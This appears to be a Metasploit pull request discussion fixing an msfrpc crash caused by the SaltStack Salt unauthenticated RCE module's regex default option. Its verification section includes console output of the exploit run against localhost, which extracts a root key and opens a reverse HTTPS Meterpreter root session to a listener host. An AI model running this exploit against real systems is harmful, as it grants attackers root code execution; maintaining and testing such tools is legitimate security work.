OptRegExp default value as string representation

[jmartin-tech]

OptRegExp default should be string to utilize in a Regex.
This allows for the object to serialize in metadata and via
rpc bridge when transimiteed using msgpack.

Verification

• See rpc.call('module.info', 'exploit', 'linux/misc/saltstack_salt_unauth_rce') error #13943
• Verify module still works.

[jmartin-tech]

See #13401 for original module testing steps.

[space-r7]

Can confirm that the module still works as intended, although still getting the msfrpc error:

Module Output

msf6 > use exploit/linux/misc/saltstack_salt_unauth_rce
[*] Using configured payload python/meterpreter/reverse_https
msf6 exploit(linux/misc/saltstack_salt_unauth_rce) > set rhost 127.0.0.1
rhost => 127.0.0.1
msf6 exploit(linux/misc/saltstack_salt_unauth_rce) > set lhost 192.168.140.3
lhost => 192.168.140.3
msf6 exploit(linux/misc/saltstack_salt_unauth_rce) > run

[*] Started HTTPS reverse handler on https://192.168.140.3:8443
[*] 127.0.0.1:4506 - Using auxiliary/gather/saltstack_salt_root_key as check
[*] 127.0.0.1:4506 - Connecting to ZeroMQ service at 127.0.0.1:4506
[*] 127.0.0.1:4506 - Negotiating signature
[*] 127.0.0.1:4506 - Negotiating version
[*] 127.0.0.1:4506 - Negotiating NULL security mechanism
[*] 127.0.0.1:4506 - Sending READY command of type REQ
[*] 127.0.0.1:4506 - Yeeting _prep_auth_info() at 127.0.0.1:4506
[+] 127.0.0.1:4506 - Root key: 3TwdIigmyn90TognTkg7M0jKeU/YAgnPGB6cK/x0LlEZUuozMq2brUP9R6PZx8QU9PiihU/9pdo=
[*] 127.0.0.1:4506 - Connecting to ZeroMQ service at 127.0.0.1:4506
[*] 127.0.0.1:4506 - Negotiating signature
[*] 127.0.0.1:4506 - Negotiating version
[*] 127.0.0.1:4506 - Negotiating NULL security mechanism
[*] 127.0.0.1:4506 - Sending READY command of type REQ
[*] 127.0.0.1:4506 - Executing Python payload on the master: python/meterpreter/reverse_https
[*] 127.0.0.1:4506 - Yeeting runner() at 127.0.0.1:4506
[*] https://192.168.140.3:8443 handling request from 192.168.140.3; (UUID: mieehrsb) Staging python payload (39708 bytes) ...
[*] Meterpreter session 1 opened (192.168.140.3:8443 -> 127.0.0.1) at 2021-09-22 17:04:09 -0500

meterpreter > getuid
sServer username: root
meterpreter > sysinfo
Computer        : 80228cfb4cee
OS              : Linux 5.10.47-linuxkit #1 SMP Sat Jul 3 21:51:47 UTC 2021
Architecture    : x64
System Language : C
Meterpreter     : python/linux
meterpreter >

msfrpc output

>> rpc.call('module.info', 'exploit', 'linux/misc/saltstack_salt_unauth_rce')
Traceback (most recent call last):
	18: from ./msfrpc:91:in `<main>'
	17: from /Users/space/rapid7/metasploit-framework/lib/rex/ui/text/irb_shell.rb:52:in `run'
	16: from /Users/space/rapid7/metasploit-framework/lib/rex/ui/text/irb_shell.rb:52:in `catch'
	15: from /Users/space/rapid7/metasploit-framework/lib/rex/ui/text/irb_shell.rb:53:in `block in run'
	 2: from (irb):1:in `<main>'
	 1: from /Users/space/rapid7/metasploit-framework/lib/msf/core/rpc/v10/client.rb:104:in `call'
/Users/space/rapid7/metasploit-framework/lib/msf/core/rpc/v10/client.rb:162:in `send_rpc_request': nil (RuntimeError)

Other modules that use a Regexp option seem to work fine:

rpc.call('module.info', 'auxiliary', 'spoof/nbns/nbns_response')
=>
{"type"=>"auxiliary",
 "name"=>"NetBIOS Name Service Spoofer",
 <snip>
   "REGEX"=>
    {"type"=>"regexp",
     "required"=>true,
     "advanced"=>false,
     "desc"=>"Regex applied to the NB Name to determine if spoofed reply is sent",
     "default"=>".*"}}}

[jmartin-tech]

@space-r7 are you sure the rpc service was running with this code?

$ ./msfrpc -P pass123 -a 127.0.0.1
[*] The 'rpc' object holds the RPC client interface
[*] Use rpc.call('group.command') to make RPC calls

>> rpc.call('module.info', 'exploit', 'linux/misc/saltstack_salt_unauth_rce')
=>
{"type"=>"exploit",
 "name"=>"SaltStack Salt Master/Minion Unauthenticated RCE",
 "fullname"=>"exploit/linux/misc/saltstack_salt_unauth_rce",
 "rank"=>"great",
 "disclosuredate"=>"2020-04-30",
 "description"=>

[space-r7]

@space-r7 are you sure the rpc service was running with this code?

$ ./msfrpc -P pass123 -a 127.0.0.1
[*] The 'rpc' object holds the RPC client interface
[*] Use rpc.call('group.command') to make RPC calls

>> rpc.call('module.info', 'exploit', 'linux/misc/saltstack_salt_unauth_rce')
=>
{"type"=>"exploit",
 "name"=>"SaltStack Salt Master/Minion Unauthenticated RCE",
 "fullname"=>"exploit/linux/misc/saltstack_salt_unauth_rce",
 "rank"=>"great",
 "disclosuredate"=>"2020-04-30",
 "description"=>

Oops, I was on the right branch, but hadn't restarted the service. This works now, thanks!

 ./msfrpc -U msf -P msf -a 127.0.0.1
[*] The 'rpc' object holds the RPC client interface
[*] Use rpc.call('group.command') to make RPC calls

>> rpc.call('module.info', 'exploit', 'linux/misc/saltstack_salt_unauth_rce')
=>
{"type"=>"exploit",
 "name"=>"SaltStack Salt Master/Minion Unauthenticated RCE",
 "fullname"=>"exploit/linux/misc/saltstack_salt_unauth_rce",
 "rank"=>"great",
 "disclosuredate"=>"2020-04-30",
 "description"=>
  "This module exploits unauthenticated access to the runner() and _send_pub() methods in the SaltStack Salt master's ZeroMQ request server, for versions 2019.2.3 and earlier and 3000.1 and earlier, to execute code as root on either the master or on select minions. VMware vRealize Operations Manager versions 7.5.0 through 8.1.0, as well as Cisco Modeling Labs Corporate Edition (CML) and Cisco Virtual Internet Routing Lab Personal Edition (VIRL-PE), for versions 1.2, 1.3, 1.5, and 1.6 in certain configurations, are known to be affected by the Salt vulnerabilities. Tested against SaltStack Salt 2019.2.3 and 3000.1 on Ubuntu 18.04, as well as Vulhub's Docker image.",
 "license"=>"Metasploit Framework License (BSD)",
 "filepath"=>
  "/Users/space/rapid7/metasploit-framework/modules/exploits/linux/misc/saltstack_salt_unauth_rce.rb",
 "arch"=>["python", "cmd"],
 <snip>

[space-r7]

Release Notes

This fixes a crash in msfrpc that occurs due to the exploit/linux/misc/saltstack_salt_unauth_rce module's MINIONS option default being a regex instead of a string.